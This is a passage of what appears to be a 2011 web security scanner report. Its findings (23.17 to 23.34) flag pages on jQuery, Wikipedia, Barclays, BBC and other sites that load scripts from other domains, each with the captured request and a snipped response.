   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.17. http://docs.jquery.com/UI/Widget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Widget

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Widget HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Tue, 03 May 2011 13:20:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 14206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.18. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_banks_in_Thailand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/List_of_banks_in_Thailand HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 04:37:35 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Tue, 12 Apr 2011 03:39:00 GMT
Content-Type: text/html; charset=UTF-8
Age: 111991
X-Cache: HIT from sq71.wikimedia.org
X-Cache-Lookup: HIT from sq71.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: keep-alive
Content-Length: 48181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/w/extensions-1.17/WikimediaMobile/MobileRedirect.js?8.2" type="text/javascript"></script>
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/en.wikipedia.org/load.php?debug=false&amp;lang=en&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

23.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-7912187763300211&output=html&h=240&slotname=4561224372&w=120&lmt=1278669650&flash=0&url=http%3A%2F%2Fwww.set.or.th%2Fen%2Fproducts%2Findex%2Fsetindex_p1.html&dt=1304449116086&bpp=2&shv=r20110427&jsv=r20110427&correlator=1304449118371&frm=0&adk=2300911850&ga_vid=407703298.1304448074&ga_sid=1304448074&ga_hid=2050278855&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=5&u_nmime=39&biw=1005&bih=852&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Fregulations%2Fcg%2Froles_p1.html&fu=0&ifi=1&dtd=4325&xpc=kCaOuAZijd&p=http%3A//www.set.or.th HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/products/index/setindex_p1.html
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:58:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.20. http://group.barclays.com/Citizenship/Community-Investment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://group.barclays.com
Path:   /Citizenship/Community-Investment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Citizenship/Community-Investment HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=68; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454104927:ss=1304454046661; __unam=2099162-12fb6735ea2-70159163-2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:55 GMT
Set-Cookie: JSESSIONID=CA839B7D4576D701F5DE88D9B54EFFC2.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 09:43:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 31439


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...
</a>
       <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

23.21. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://group.barclays.com
Path:   /What-we-do/Sponsorship/Community-sponsorship

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /What-we-do/Sponsorship/Community-sponsorship HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454061117:ss=1304454046661

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:44 GMT
Set-Cookie: JSESSIONID=A27A687978F449F8DADD8F8B71913013.tomcat_1_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 10:21:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 25029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...
</a>
       <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

23.22. http://group.barclays.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://group.barclays.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: group.barclays.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:18:20 GMT
Set-Cookie: JSESSIONID=CB14CE0B2823EF4971F0F1F69E05FDCF.tomcat_1_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:18:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...
</a>
       <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

23.23. http://img.sedoparking.com/jspartner/google.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.sedoparking.com
Path:   /jspartner/google.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /jspartner/google.js HTTP/1.1
Host: img.sedoparking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Tue, 03 May 2011 13:31:33 GMT
Content-Type: application/x-javascript
Connection: keep-alive
ETag: "1aaa868c239b9e3d506492067f3493e5"
X-CF1: fE.iad2:cf:cacheE.iad2-01
Last-Modified: Fri, 29 Apr 2011 11:23:37 GMT
X-CF2: L
Content-Length: 5072

var ads="";var sendrequest=true;function loadPortal(f){var g="/search/portal.php?"+onclick_param_l+"="+onclick_value_l;$.ajax({type:"GET",url:g,dataType:"json",success:function(a){var b=$("#jsads").pa
...[SNIP]...
tainer").style.display="block"}}function requestToken(a){if("undefined"!==typeof token_required&&true===token_required){google_afd_request=a;a=null;callGoogle()}}
function callGoogle(){document.write('<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"><\/script>
...[SNIP]...

23.24. http://ipinfusion.com/js/header.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipinfusion.com
Path:   /js/header.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /js/header.js HTTP/1.1
Host: ipinfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ipinfusion.com/products/data_sheets.html?gclid=CPvhrtDyy6gCFeVn5QodWm462A

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:31:26 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 06:16:57 GMT
ETag: "7d0245-28de-fd2ba840"
Accept-Ranges: bytes
Content-Length: 10462
Content-Type: application/x-javascript

// header.js


function myobjSection(strSectionName, strSectionURL, strSectionAltName, strSectionMenuNumber)
{
   //object for website sections
   this.strSectionName = strSectionName;
   this.strSectionURL
...[SNIP]...
</form>');
   document.write('<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<input type="image" name="sa" src="/images/search_button.gif" class="search_button" /><script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<input type="image" name="sa" src="/images/search_button.gif" class="search_button" /><script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</form>');
           document.write('<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</form>');
       document.write('<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

23.25. http://ja.wikipedia.org/wiki/ă?żă?¤ă?®é??čˇ?ă?®ä¸?覧  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ja.wikipedia.org
Path:   /wiki/........................

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/........................ HTTP/1.1
Host: ja.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:22:03 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: ja
Vary: Accept-Encoding,Cookie
Last-Modified: Fri, 29 Apr 2011 16:20:21 GMT
Content-Length: 49987
Content-Type: text/html; charset=UTF-8
Age: 103
X-Cache: HIT from sq71.wikimedia.org
X-Cache-Lookup: HIT from sq71.wikimedia.org:3128
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="ja" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
</script><script src="http://bits.wikimedia.org/w/extensions-1.17/WikimediaMobile/MobileRedirect.js?8.2" type="text/javascript"></script>
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/ja.wikipedia.org/load.php?debug=false&amp;lang=ja&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/ja.wikipedia.org/load.php?debug=false&amp;lang=ja&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

23.26. http://javascript.nwbox.com/IEContentLoaded/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://javascript.nwbox.com
Path:   /IEContentLoaded/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /IEContentLoaded/ HTTP/1.1
Host: javascript.nwbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 22:16:24 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Sun, 01 Aug 2010 04:41:14 GMT
ETag: "4366-b1a50e80"
Accept-Ranges: bytes
Content-Length: 17254
Cache-Control: max-age=259200
Expires: Fri, 06 May 2011 22:16:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>IECo
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

23.27. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:23:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 20:44:18 GMT
ETag: "49602b8-3eb2-5b6fac80"
Accept-Ranges: bytes
Content-Length: 16050
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

23.28. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 03 May 2011 13:24:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

23.29. http://jscrollpane.kelvinluck.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jscrollpane.kelvinluck.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jscrollpane.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:19 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 09:42:16 GMT
ETag: "74ba63a-3abc-49a946a4b4e00"
Accept-Ranges: bytes
Content-Length: 15036
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
       "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>

       <title>jScrollPane - cross browser styleable scrollbars with jQuery and CSS</
...[SNIP]...
<!-- latest jQuery direct from google's CDN -->
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.30. http://marketdata.set.or.th/mkt/topten.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mkt/topten.do?language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=23A1B718BE31C3B5E88C96682836394A; Path=/mkt
Content-Length: 57003


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=23A1B718BE31C3B5E88C96682836394A" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.31. http://marketdata.set.or.th/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /search.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.html HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/shortcut-en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:49 GMT
Server: Apache
Last-Modified: Sat, 04 Jul 2009 08:27:01 GMT
ETag: "618429-5bf-9797f40"
Accept-Ranges: bytes
Content-Length: 1471
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
.topbox {FONT: 8pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=th"></script>
...[SNIP]...

23.32. http://nerdbots.com/services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nerdbots.com
Path:   /services.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /services.html HTTP/1.1
Host: nerdbots.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nerdbots.com/index.html
Cookie: __utma=39949757.754194945.1304447519.1304447519.1304447519.1; __utmb=39949757.2.10.1304447519; __utmc=39949757; __utmz=39949757.1304447519.1.1.utmgclid=CL2Qyszyy6gCFYFM5QodqHBPqQ|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 200 OK
Content-Length: 6054
Content-Type: text/html
Last-Modified: Sun, 10 Apr 2011 04:35:10 GMT
Accept-Ranges: bytes
ETag: "93744ad38f7cb1:4d0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:44:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" con
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

23.33. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:23 GMT
Keep-Alive: timeout=10, max=797
Expires: Tue, 03 May 2011 13:24:23 GMT
Connection: close
Set-Cookie: BBC-UID=045dbce0a042c0970d04923c215c459e7213a490607001493bbb322c2d655fdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=045dbce0a042c0970d04923c215c459e7213a490607001493bbb322c2d655fdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43768

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.8.15//desktop/2.7/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.3.js"> </script>
...[SNIP]...
<!--newsi library v1.28-->
<script src="http://news.bbcimg.co.uk/js/newsi/latest/newsi.js?9" type="text/javascript"></script>
...[SNIP]...
<!-- GEN JS V4 -->


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/3_6/bbc_fmtj_config_v4.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/ticker/v1_2_0/ticker.js"></script>


                   <script src="http://news.bbcimg.co.uk/js/legacy/1_1/news.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_63/bbccom.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_32/adsense_write.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_52/s_code.js"></script>
...[SNIP]...

23.34. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:24 GMT
